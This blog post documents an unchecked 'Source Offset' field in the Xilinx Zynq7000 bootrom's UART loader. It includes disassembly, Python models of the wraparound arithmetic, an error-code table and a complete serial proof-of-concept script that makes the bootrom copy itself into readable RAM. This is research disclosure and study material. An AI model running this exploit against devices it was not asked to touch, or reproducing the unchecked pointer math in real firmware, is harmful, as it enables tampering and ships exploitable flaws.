This exploit has no security implications. Stop asking if it can bypass anything. It is just an easy way to grab the ROM.
The first time I wrote about this, it was just to document this feature from a usability perspective. There's a script up there that should "just work". I also lied a little - There is an interesting bug, and it may have been exactly why Xilinx didn't document it (update: nope, this was not why). That post is still accurate if you're just interested in the workings of the UART loader, however. Otherwise...
The Easy Way
The ROM is architected such that when the boot mode is selected, it first calls an initialization function for that interface, then it registers a callback for when the ROM needs more data.
The UART initialization routine sticks the entire payload in RAM - hardcoded in my ROM to 0x4_0000.
For the UART loader's callback, it is pretty simple - here's the whole thing:
; void uart_callback(u32 r0_offset, void* r1_dest, i32 r2_nbytes)
ROM:0000A578 PUSH {R3,LR}
ROM:0000A57C MOV R3, #uart_buff ; 0x40000 in my rom
ROM:0000A584 MOV R12, #1
ROM:0000A588 LDR R3, [R3]
ROM:0000A58C MOVT R12, #7
ROM:0000A590 ADD R3, R3, R0 ; calculate source: (uart_buff + offset)
ROM:0000A594 CMP R3, R12 ; check upper source bound: (uart_buff + offset <= 0x7_0001)
ROM:0000A598 BHI exit
ROM:0000A59C SUB R12, R3, #0x70000
ROM:0000A5A0 SUB LR, R12, #1
ROM:0000A5A4 ADD R0, LR, R2 ; R0 = (nbytes + offset + uart_buff) - 0x70001
ROM:0000A5A8 CMP R0, #0
ROM:0000A5AC RSBGT R2, R0, R2 ; nbytes
ROM:0000A5B0 MOV R0, R1 ; dst
ROM:0000A5B4 MOV R1, R3 ; src
ROM:0000A5B8 BL memcpy
ROM:0000A5BC
ROM:0000A5BC exit:
ROM:0000A5BC MOV R0, #0
ROM:0000A5C0 POP {R3,PC}
The intent of this routine is straightforward: Grab nbytes from offset bytes deep into the ROM image, and write them to dest.
The RSBGT weirdness at 0xa5ac is a check for the span of the request (combined with the check at 0xa5a8), but is redundant and doesn't account for some wraparounds anyway.
The interesting part is the source address calculation: There is a check, but it is just for the upper bound, which we already know is constrained by earlier logic. Otherwise, it just adds our r0_offset argument directly.
That's nice - if we fully control r0_offset at any point where r1_dest is something that persists after the ROM has locked itself down (which is kinda the whole idea of a bootrom...), we can stash stuff to look at later, as long as it lives below 0x70000.
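To make the wraparound concrete, here is a rough Python model of the callback's arithmetic, transcribed from the listing above. The function and constant names are mine, and 0x4_0000 is the buffer base from my ROM (other revisions may differ). It only models the address math, not the memcpy itself.

```python
MASK = 0xFFFF_FFFF      # registers are 32 bits wide
UART_BUFF = 0x4_0000    # buffer base in my ROM (assumption for other revisions)
LIMIT = 0x7_0001        # constant built by MOV/MOVT into R12


def to_signed(value):
    """Interpret a 32-bit value the way CMP #0 / RSBGT does (signed)."""
    value &= MASK
    return value - (1 << 32) if value & 0x8000_0000 else value


def uart_callback_model(offset, nbytes):
    """Return (src, nbytes) handed to memcpy, or None if the routine bails."""
    src = (UART_BUFF + offset) & MASK          # ADD R3, R3, R0 (wraps silently)
    if src > LIMIT:                            # CMP R3, R12 / BHI exit (unsigned)
        return None
    over = (src + nbytes - LIMIT) & MASK       # SUB, SUB, ADD
    if to_signed(over) > 0:                    # CMP R0, #0 / RSBGT
        nbytes = (nbytes - over) & MASK        # trim the span to end at LIMIT
    return src, nbytes


# An ordinary request reads from inside the UART buffer.
print(uart_callback_model(0x100, 0x40))
# An offset of -0x4_0000 (mod 2**32) wraps the source down to address 0.
print(uart_callback_model(0x1_0000_0000 - 0x4_0000, 0x2_0000))
```

The second call is the interesting one: the sum wraps past 2**32, lands on 0, and sails through the upper-bound check because nothing ever looks at the lower bound.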
Aside: The same logic exists in both NOR and QSPI boot processes, with mildly fewer constraints. The UART is just a handier interface for iterating on something like this!
During a normal boot process, our callback is called a handful of times while processing the bootrom header (no TOCTOU, sorry: most stuff ends up being cached if relevant). Here are the important fields:
Figure: Zynq7000 bootrom header format
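For reference, here is a small sketch that decodes those fields from an image, going by the order the PoC script at the end of this post packs them in. The field names are informal labels taken from that script's comments, not official ones, and the helper names are made up for illustration.

```python
from struct import pack, unpack_from

# (byte offset, informal name) pairs, in the order the PoC script packs them.
FIELDS = [
    (0x20, "width_detect"),
    (0x24, "image_id"),
    (0x28, "encryption"),
    (0x2C, "misc"),
    (0x30, "source_offset"),
    (0x34, "length"),
    (0x38, "load_addr"),
    (0x3C, "entry_point"),
    (0x40, "total_image_len"),
    (0x44, "qspi_word"),
    (0x48, "checksum"),
]


def parse_header(image):
    """Decode the little-endian 32-bit header fields into a dict."""
    return {name: unpack_from("<I", image, off)[0] for off, name in FIELDS}


def header_checksum_ok(image):
    """Check that the stored checksum is the inverted sum of words 0x20..0x44."""
    total = sum(unpack_from("<I", image, off)[0] for off in range(0x20, 0x48, 4))
    return 0xFFFF_FFFF - (total & 0xFFFF_FFFF) == parse_header(image)["checksum"]


# Rebuild the first 0x4C bytes with the same values the PoC uses, then decode.
words = [0xEAFFFFFE] * 8 + [0xAA995566, 0x584C4E58, 0, 0x01010000,
                            0xFFFC_0000, 0x2_0000, 0, 0xFCB4, 0x010014, 1]
checksum = 0xFFFF_FFFF - (sum(words[8:]) & 0xFFFF_FFFF)
image = pack("<18I", *words) + pack("<I", checksum)

hdr = parse_header(image)
print(hex(hdr["source_offset"]), hex(hdr["entry_point"]))
print(header_checksum_ok(image))
```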
The final call (in non-secureboot mode) is to just read the whole image, starting at the bootrom header field "Source Offset" - plus, if we're starting from a multiboot-capable image, that multiboot image base offset. UART isn't multiboot-capable, so that is always 0.
"Source Offset" is unusual in that it is entirely unchecked, so... Since we completely control this 32-bit field, we also completely control the result when a constant is added to it, because the addition simply wraps modulo 2^32.
In this case, this allows us to arbitrarily read a reasonable amount (within normal image size limits) from any address under 0x70000.
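Working backwards from a target address to the header value is a single subtraction. A minimal sketch, assuming the 0x4_0000 base from my ROM; the helper name source_offset_for is made up for illustration:

```python
MASK = 0xFFFF_FFFF
UART_BUFF = 0x4_0000   # constant the ROM adds to the field; value from my ROM
CEILING = 0x7_0000     # reads must start below this address


def source_offset_for(target):
    """Return the 32-bit 'Source Offset' that makes the ROM read from target."""
    if not 0 <= target < CEILING:
        raise ValueError("target must be below 0x7_0000")
    return (target - UART_BUFF) & MASK


offset = source_offset_for(0x0)
print(hex(offset))                          # value to place in the header
print(hex((UART_BUFF + offset) & MASK))     # address the ROM ends up reading
```

For a target of 0 this gives the same value as the 0x1_0000_0000-0x40000 expression the PoC puts in the header.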
There's a script attached to exploit this - Run it, attach your favorite debugger and find the ROM readily in OCM RAM starting at 0 (mrd -bin -file whatever.bin 0 0x8000 will do the trick). The only bit that could not be determined by experimentation is the entry point I use (which is just a busy loop).
Obviously this is just a quality of life thing :)
Anyway, hope this is a little interesting, or provides a reason to be a little more careful about pointer math, or minimally gives everyone an easier way of getting at the ROM without copyright issues or glitching or (...tbd...).
Additional BootROM Error Codes
The Xilinx BootROM supplies error codes a couple of ways - usually through blinking an LED on a well-known pin. The UART loader is unique in that they'll be spit right out over UART! Obviously these aren't among the documented codes, so here are my interpretations:
Error Code | Cause |
---|---|
0x2501 | Did not successfully complete the 'BAUD' handshake within 128 tries. |
0x2502 | Size (signed!) is > 0x30000. |
0x2503 | UART checksum error (*not* a boot header checksum). Set to 0 to bypass. |
0x200A | Occurs when there's a (bootrom header) checksum error in the image due to multiboot logic. |
(The signed size check is not an exploitable bug!)
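If you are scripting against the loader, the table drops straight into a lookup. This is only a sketch: the descriptions are my interpretations from above, the helper names are hypothetical, and how you pull the code out of the UART stream is left to you. The second helper just illustrates what "signed" means for the 0x2502 check, assuming it is a plain signed 32-bit comparison.

```python
# Interpretations from the table above; these are my readings, not official.
UART_ERROR_CODES = {
    0x2501: "'BAUD' handshake did not complete within 128 tries",
    0x2502: "size (signed) is greater than 0x30000",
    0x2503: "UART checksum error (not the boot header checksum)",
    0x200A: "bootrom header checksum error, reported via the multiboot logic",
}


def describe_error(code):
    """Map a numeric error code to a description, or flag it as unknown."""
    return UART_ERROR_CODES.get(code, "unknown code " + hex(code))


def size_rejected(size):
    """Model the 0x2502 check, assuming a signed 32-bit comparison."""
    signed = size - (1 << 32) if size & 0x8000_0000 else size
    return signed > 0x3_0000


print(describe_error(0x2502))
print(size_rejected(0x3_0001), size_rejected(0xFFFF_FFFF))
```

Under that assumption a size with the top bit set reads as negative and does not trip 0x2502, which is the oddity the table calls out; as noted, it does not lead anywhere useful.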
Demo/PoC:
The exploit is pretty simple - It's little more than my UART loader script plus some magic values:
#!/usr/bin/env python3
from struct import pack as p
from struct import unpack as up
import serial
import time
import sys
baudgen = 0x11
reg0 = 0x6
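def chksum(data):
    # byte-wise sum over the whole payload (the UART checksum)
    chk = 0
    for d in data:
        chk += d
        chk &= 0xFFFF_FFFF
    return chk

def hdrchksum(data):
    # sum of little-endian 32-bit words (the boot header checksum)
    chk = 0
    for i in range(0, len(data), 4):
        chk += up("<I", data[i:i+4])[0]
        chk &= 0xFFFF_FFFF
    return chk
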
def gen_hdr():
    hdr = b''
    # xip ivt: eight branch-to-self instructions
    for _ in range(8):
        hdr += p("<I", 0xeafffffe)
    # width detect
    hdr += p("<I", 0xaa995566)
    hdr += b'XNLX'
    # encryption + misc
    hdr += p("<II", 0, 0x01010000)
    # :D ('source offset' - why yes, I'd like to boot the bootrom!)
    hdr += p("<I", 0x1_0000_0000-0x40000)
    # len
    hdr += p("<I", 0x2_0000)
    # load addr 0 or 0x4_0000 only...
    hdr += p("<I", 0)
    # entrypt (just a loop :))
    hdr += p("<I", 0x0FCB4)
    # "total image len" doesn't matter here
    hdr += p("<I", 0x010014)
    # QSPI something something
    hdr += p("<I", 1)
    # checksum
    hdr += p("<I", 0xffff_ffff - hdrchksum(hdr[0x20:]))
    # unused...
    for _ in range(19):
        hdr += p("<I", 0)
    # not sure at allll:
    hdr += p("<II", 0x8c0,0x8c0)
    # init lists
    for _ in range(0x100):
        hdr += p("<II", 0xffff_ffff, 0)
    return hdr

img = gen_hdr()
size = len(img)
checksum = chksum(img)
print("checksum: "+hex(checksum))
print("len: "+str(size))
ser = serial.Serial(timeout=0.5)
ser.port = "/dev/ttyUSB0"
ser.baudrate = 115200
ser.open()
while ser.read(1) != b'X':
    continue
assert ser.read(8) == b'LNX-ZYNQ'
ser.write(b"BAUD")
ser.write(baudgen.to_bytes(4, 'little'))
ser.write(reg0.to_bytes(4, 'little'))
ser.write(size.to_bytes(4, 'little'))
ser.write(checksum.to_bytes(4, 'little'))
print("writing image...")
# sleep here 'cause this is where they hit resets for the tx/rx logic,
# and anything in-flight when that happens is lost (it happens a fair bit)
time.sleep(0.1)
print("wrote: " + str(ser.write(img)))
# let any error logic propagate..
time.sleep(0.1)
if ser.in_waiting == 0:
    print("ok, i think we are done, ROM is 0x2_0000 bytes starting at 0 :)")
else:
    print("something went wrong? bootrom says: " + str(ser.read(ser.in_waiting)))
Figure: first 16 instructions of the bootrom, via this script
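To eyeball the same words from a dump file without a disassembler, something like the following works. It is a sketch with made-up helper names, and the sample bytes are a stand-in (the branch-to-self word from the PoC header), not actual ROM contents.

```python
from struct import unpack_from


def first_words(data, count=16):
    """Return up to `count` little-endian 32-bit words from the start of data."""
    usable = min(count, len(data) // 4)
    return [unpack_from("<I", data, 4 * i)[0] for i in range(usable)]


def format_words(words, base=0):
    """Render words one per line as 'address: value', both in hex."""
    return [f"{base + 4 * i:08x}: {w:08x}" for i, w in enumerate(words)]


# Stand-in bytes so the sketch runs without a board: eight branch-to-self
# words like the ones in the PoC header. This is NOT real ROM content.
sample = bytes.fromhex("feffffea") * 8
for line in format_words(first_words(sample)):
    print(line)

# With a real dump: data = open("whatever.bin", "rb").read()
```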
small addendum: if you have one of those cheap eBay Antminer boards (schematic here), the UART header is hooked up perfectly: you can select the correct mode by setting the two outermost jumpers toward the board edge, and the inner two the opposite direction.
additionally: it is possible to stash code based at 0x4_0000. you cannot specify an entrypoint over 0x3_0000, so it's not possible to jump directly into this code. you have a single jump with very minimal (nonexistent, really) register control - is it possible to write the exploit such that it dumps the bootrom entirely over UART without the aid of JTAG or another boot device? I suspect so, but have not proved it out. You can be first - Happy Hacking!